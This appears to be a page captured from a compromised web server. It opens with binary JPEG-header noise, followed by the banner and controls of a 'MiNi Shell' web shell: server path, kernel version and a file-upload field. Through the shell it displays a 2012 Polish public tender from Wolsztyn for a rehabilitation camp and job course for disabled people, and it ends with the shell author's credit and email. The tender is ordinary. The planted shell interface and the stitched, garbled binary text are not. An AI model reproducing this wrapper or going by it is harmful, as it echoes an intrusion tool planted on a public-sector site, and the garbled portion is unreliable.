JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121004/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121004/381116-N-2012.html

<p class="kh_header"><b>Wolsztyn: Zorganizowanie 14-dniowego Obozu Rehabilitacyjnego dla 15 osób z niepełnosprawnością narządu ruchu wraz z 15 opiekunami oraz przeprowadzenia w trakcie Obozu Rehabilitacyjnego 40 - godzinnego Kursu Aktywizacji Zawodowej i Społecznej dla 15 osób niepełnosprawnych w ramach realizowanego przez Powiatowe Centrum Pomocy Rodzinie  w Wolsztynie projektu systemowego STOP WYKLUCZENIU SPOŁECZNEMU W POWIECIE WOLSZTYŃSKIM, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 381116 - 2012; data zamieszczenia: 04.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie w Wolsztynie , ul. 5 Stycznia 5, 64-200 Wolsztyn, woj. wielkopolskie, tel. 68 384 56 13, faks 68 347 22 95.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcpr.powiatwolsztyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie 14-dniowego Obozu Rehabilitacyjnego dla 15 osób z niepełnosprawnością narządu ruchu wraz z 15 opiekunami oraz przeprowadzenia w trakcie Obozu Rehabilitacyjnego 40 - godzinnego Kursu Aktywizacji Zawodowej i Społecznej dla 15 osób niepełnosprawnych w ramach realizowanego przez Powiatowe Centrum Pomocy Rodzinie  w Wolsztynie projektu systemowego STOP WYKLUCZENIU SPOŁECZNEMU W POWIECIE WOLSZTYŃSKIM, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 14 dniowy Obóz Rehabilitacyjny dla 15 osób z niepełnosprawnością narządu ruchu wraz z 15 opiekunami w dwóch grupach [ 7 osób niepełnosprawnych i 7 opiekunów oraz 8 osób niepełnosprawnych i 8 opiekunów]	 oraz przeprowadzenie w trakcie Obozu Rehabilitacyjnego 40 godzinnego Kursu Aktywizacji Zawodowej i Społecznej dla 15 osób niepełnosprawnych w dwóch grupach [7 i 8 osób niepełnosprawnych] z uwzględnieniem następujących wymagań:

I. Termin wykonania zamówienia : 18.10.2012 - 16.11.2012 w dwóch turach po 14 dni. 
II. Dojazd: własny.
III. Miejsce obozu/pobytu: specjalistyczny ośrodek rehabilitacyjny położony nad Morzem Bałtyckim, oferujący program terapeutyczny [zastosowanie ćwiczeń w kombinezonie terapeutycznym EuroSuit, masaż leczniczy, ćwiczenia UGULu, ćwiczenia w UBSB, terapia rezonansem magnetycznym, terapia z użyciem butów wibrostymulacyjnych, zajęcia w aparacie Grossa, krioterapia, elektrostymulacja, laseroterapia, elektroterapia] dla pacjentów z następującymi jednostkami chorobowymi: porażenie mózgowe, różne formy urazów mózgu,  uszkodzenia rdzenia kręgowego, organiczne zmiany chorobowe  mózgu, dysfunkcje ruchu, poszkodowani w wypadkach . 

IV.  Zakwaterowanie uczestników:
13 noclegów w ośrodku murowanym, pokoje dwu osobowe. Na terenie ośródka powinna się znajdować stołówka Zamawiający nie dopuszcza zakwaterowania uczestników i kadry w kilku ośrodkach/ hotelach. Każdy z pokoi posiadał będzie własny, pełny węzeł sanitarny i wyposażony będzie w: ręczniki,  czajnik elektryczny, szklanki, kubki, pościel, mydło, szampon, telefon, odbiornik TV. Wykonawca zapewni całodobową, podstawową, nieodpłatną opiekę medyczną i pielęgniarską przez cały czas trwania Obozu. Koszty ewentualnej opłaty klimatycznej nałożonej z tytułu pobytu uczestników w miejscu świadczenia usługi ponosi wykonawca. 

V.  Wyżywienie uczestników:
Śniadania i kolacje w formie szwedzkiego stołu, obiady dwudaniowe z deserem. Każdy z posiłków z zapewnioną dostępnością napojów ciepłych (kawa/herbata) oraz zimnych (woda, soki itd.) Wykonawca zobowiązany jest uwzględnić możliwość zapewnienia posiłków wegetariańskich oraz posiłków związanych ze specyfiką grupy docelowej (np. dieta bezglutenowa, bezmleczna itd.). Ewentualna konieczność przygotowania posiłków według diety zgłoszona zostanie wykonawcy w dniu zawarcia umowy. Grupa zacznie pobyt w dniu przyjazdu od obiadu, a skończy w dniu odjazdu na śniadaniu.

VI. Warunki szkoleniowe:
Wykonawca zapewni salę szkoleniową, umożliwiającą prowadzenie zajęć. Wykonawca winien zapewnić każdemu uczestnikowi samodzielne miejsce do sporządzania notatek (pulpit/blat). Wyposażenie sali: rzutnik multimedialny i ekran do projekcji, flipchart (zapas  bloków + pisaki). Wykonawca zobowiązany jest do oznaczenia każdej sali informacjami o współfinansowaniu projektu, sporządzonymi zgodnie z wytycznymi w zakresie oznaczania projektów obowiązującymi  dla projektów współfinansowanych ze środków Europejskiego Funduszu Społecznego.  Ponadto zapewni podczas szkoleń ( 2 razy dziennie) serwis kawowy z poczęstunkiem (kawa, herbata, woda, suche ciastka).

VII. Zajęcia dydaktyczne:
1. Wykonawca posiadać musi aktualny wpis do rejestru Instytucji Szkoleniowych, zgodnie z art. 20 ustawy z dn. 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz.U. z 2008 r. Nr 69, poz. 415 z póź. zm.).
Wykonawca zapewni kadrę szkoleniową w zakresie odpowiadającym poniższej tematyce:
1) Jak praca wpłynie i zmieni twoje życie? -  aspekty posiadania pracy: rynek pracy w Polsce i UE; metody poszukiwania pracy; co utrudnia nam znalezienie pracy - fakty; stereotypy i uprzedzenia; określanie naszych celów i predyspozycji.
2) Moje dokumenty aplikacyjne: list motywacyjny, CV; własna oferta pracy; tworzenie dokumentów aplikacyjnych na wybrane ogłoszenie.
3) Autoprezentacja i rozmowa kwalifikacyjna; prawo pracy: jak się przygotować do rozmowy z pracodawcą; przebieg rozmowy rekrutacyjnej; pytania zadawane przez pracodawców oraz twoje pytania do pracodawcy; symulacja rozmowy kwalifikacyjnej; postępowanie po rozmowie rekrutacyjnej; twoje przywileje na rynku pracy - elementy prawa pracy. 4) Komunikacja interpersonalna: typy komunikacji: werbalna i niewerbalna; mowa ciała; jak zdradza emocje i myśli; zasady jej właściwego odczytywania; autoprezentacja, czyli jak Cię widzą, tak Cię piszą; wywieranie właściwego wrażenia; budowanie własnej marki. 5) Asertywność - co jest asertywnością, a co nią nie jest: asertywny styl komunikacji; obrona swoich praw poza sferą osobistą; asertywne wyrażanie pochwał i krytyki; wyrażanie złości; asertywna odmowa; asertywne wyrażanie opinii i przekonań; asertywne przyjmowanie opinii innych osób. 6) Negocjacje i ich skuteczne prowadzenie: osiąganie zakładanych celów; konflikt - czym jest; rodzaje konfliktów, strategie ich rozwiązywania.
7) Warsztaty rozwoju osobistego: komunikacja interpersonalna; budowanie zaufania oraz poczucia własnej wartości i samooceny; poczucie bezpieczeństwa w grupie; wstępne rozpoznanie oczekiwań, umiejętności i możliwości; radzenie sobie ze stresem i sytuacjami trudnymi; radzenie sobie z własnymi uczuciami w sytuacjach trudnych; przełamywanie barier tkwiących w nas, autoprezentacja. 8) Podstawy przedsiębiorczości społecznej, jej miejsce na rynku towarów i usług, Przepisy prawne z zakresu zakładania, funkcjonowania, zatrudniania w spółdzielniach socjalnych oraz działania innych podmiotów ekonomii społecznej (ZAZ, CIS, przedsiębiorstwo społeczne, niektóre formy NGO), Zakładanie spółdzielni socjalnej - krok po kroku, Finansowanie podmiotów ekonomii społecznej, Budowanie wizerunku podmiotu ekonomii społecznej i jego produktu, Działalność marketingowa i reklamowa, w tym w kontaktach z mediami, Wykorzystanie społecznego wymiaru działalności jako atutu na rynku, Podstawowe zasady skutecznej sprzedaży towarów i usług w kontakcie bezpośrednim z klientem, Współpraca podmiotów ekonomii społecznej z otoczeniem instytucjonalnym.

Wykonawca zobowiązany jest do przygotowania i bezpłatnego przekazania każdemu uczestnikowi materiałów dydaktycznych obejmujących swym zakresem treści zajęć, długopis, notatnik. Materiały powinny być ze sobą połączone w sposób uniemożliwiający łatwą dekompletację (np. zbindowane, wpięte w segregatorze/ teczce). Materiały powinny być oznakowane zgodnie z wymaganiami stawianymi dla projektów współfinansowanych ze środków Europejskiego Funduszu Społecznego. Wykonawca przekaże również Zamawiającemu po jednym komplecie materiałów. Ponadto wykonawca zobowiązany jest do przygotowania i przekazania uczestnikom  zaświadczeń o uczestnictwie i ukończeniu Obozu. Zaświadczenia powinny być oznakowane zgodnie z wymaganiami stawianymi dla projektów współfinansowanych ze środków Europejskiego Funduszu Społecznego,  przekazane zaświadczeń nastąpi w ostatnim dniu realizacji zajęć dydaktycznych. Drugi egzemplarz każdego z zaświadczeń przekazany zostanie zamawiającemu wraz z resztą dokumentacji. Wykonawca zobowiązany jest do oznaczenia na wszystkich pozostałych materiałach i wszystkich miejscach realizacji zajęć dydaktycznych informacji o współfinansowaniu projektu, sporządzonych zgodnie z wytycznymi w zakresie oznaczania projektów obowiązującymi  dla projektów współfinansowanych ze środków Europejskiego Funduszu Społecznego
Wykonawca zobowiązany jest prowadzić imienne listy, potwierdzające obecność na zajęciach dydaktycznych w każdym dniu realizacji oraz skorzystanie z wyżywienia i zakwaterowania. Listy obecności na zajęciach potwierdzane będą przez osoby prowadzące zajęcia. Listy obecności na zajęciach, listy potwierdzające skorzystanie z wyżywienia i zakwaterowania zostaną przekazane zamawiającemu po zakończeniu realizacji zamówienia. Wykonawca przeprowadzi ewaluację szkolenia tj. dokonanie oceny szkolenia za pomocą ankiet ewaluacyjnych. Wzór ankiety Wykonawca przedstawi Zamawiającemu do akceptacji nie później, niż 2 dni robocze przed planowanym wyjazdem grupy.
Wykonawca dokona wpisu o szkoleniu i związanych z nim szczegółach na stronie www.inwestycjawkadry.info.pl. 

VIII. Ubezpieczenie od Następstw Nieszczęśliwych Wypadków (NNW):
Na czas realizacji zamówienia wykonawca zobowiązany jest wykupić dla wszystkich uczestników ubezpieczenie od NNW na kwotę nie mniejszą niż 10 tys. zł na każdą osobę biorącą udział w szkoleniu. Ubezpieczenie obejmie swym zakresem czas przejazdu uczestników na miejsce realizacji i z powrotem oraz cały okres pobyt uczestników w miejscu realizacji. Polisa zostanie dostarczona Zamawiającemu najpóźniej w dniu wyjazdu.  

IX. Zabiegi rehabilitacyjne:
Wykonawca winien zapewnić uczestnikom Obozu wyspecjalizowane, związane z rodzajem niepełnosprawności, bardzo intensywne i kompleksowe zabiegi rehabilitacyjne usprawniające ruchowo [ zastosowanie ćwiczeń w kombinezonie terapeutycznym EuroSuit, masaż leczniczy, ćwiczenia UGULu, ćwiczenia w UBSB, terapia rezonansem magnetycznym, terapia z użyciem butów wibrostymulacyjnych, zajęcia w aparacie Grossa, krioterapia, elektrostymulacja, laseroterapia, elektroterapia]. Program terapii ma być ustalany  indywidualnie dla każdego pacjenta po ewaluacji dokumentacji medycznej uprzednio dostarczonej i wywiadzie z pacjentem bądź jego opiekunem. Każdy pacjent ma być indywidualnie badany przez grupę wyspecjalizowanych w metodyce terapeutów i lekarzy w pierwszym dniu Obozu aby ustalić indywidualny i precyzyjny program rehabilitacji, który w trakcie Obozu może być modyfikowany w celu osiągnięcia jak najlepszych rezultatów przez pacjenta. Wykonawca winien zapewnić odpowiednią kadrę terapeutów [ wieloletnie doświadczenie w usprawnianiu pacjentów, ukończone studia o odpowiednim kierunku, kwalifikacje w terapii takimi metodami jak PNF, NDT-bobath, Vojty ], lekarzy [ specjalista rehabilitacji w chorobach narządu ruchu, specjalista rehabilitacji medycznej]..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.14.00.00-2, 55.30.00.00-3, 55.13.00.00-0, 55.12.00.00-7, 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	posiadania uprawnień do wykonywania określonej działalności lub czynności, je?żeli 
     przepisy prawa  nakładają obowiązek posiadania takich uprawnień;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o posiadaniu wiedzy i doświadczenia - z wykorzystanie zał. nr 2 do SIWZ
-wykaz usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że usługi te zostały wykonane lub są wykonywane należycie; z zastosowanie zał. nr 6 do SIWZ. Z wykazu musi wynikać przeprowadzenie: min. 5 usług trwających min. 7 dni każda, polegających na organizacji np. obozów, szkoleń związanych z realizowaniem projektów na rzecz środowisk zagrożonych wykluczeniem społecznym;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-oświadczenie o posiadaniu potencjału technicznego do wykonania zamówienia - z wykorzystaniem zał. nr 2 do SIWZ
- wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami, wraz z informacją o podstawie dysponowania tymi zasobami z wykorzystaniem załącznika nr 7 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- oświadczenie o dysponowaniu osobami zdolnymi do wykonania zamówienia z wykorzystaniem wzoru -zał.2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-oświadczenie o sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia -z wykorzystaniem wzoru -zał.2 do SIWZ
-oświadczenie potwierdzającą posiadanie środków finansowych w kwocie minimum 100.000,00 zł - z wykorzystaniem zał. nr 10 do SIWZ,
-opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 100.000,00 zł wraz z potwierdzeniem zapłaty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-oświadczenie o niezaleganiu w opłacaniu podatków w Urzędzie skarbowym- z wykorzystaniem zał. nr 4 do SIWZ-oświadczenie o niezaleganiu w opłacaniu składek na ubezpieczenie zdrowotne i społeczne- z wykorzystaniem zał. nr 5 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcpr.powiatwolsztyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http://bip.wokiss.pl/wolsztynp/bip/jednostki-organizacyjne-samorzadu-terytorialnego/powiatowe-centrum-pomocy-rodzinie/przetargi-ogloszenia1.html.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.10.2012 godzina 14:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Wolsztynie ul. 5 Stycznia 5 64-200 Wolsztyn, Sekretariat p.34.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane jest w ramach realizowanego przez Powiatowe Centrum Pomocy Rodzinie  w Wolsztynie projektu systemowego STOP WYKLUCZENIU SPOŁECZNEMU W POWIECIE WOLSZTYŃSKIM, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013, Priorytet VII - Promocja integracji społecznej, Działanie 7.1 - Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.2 - Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com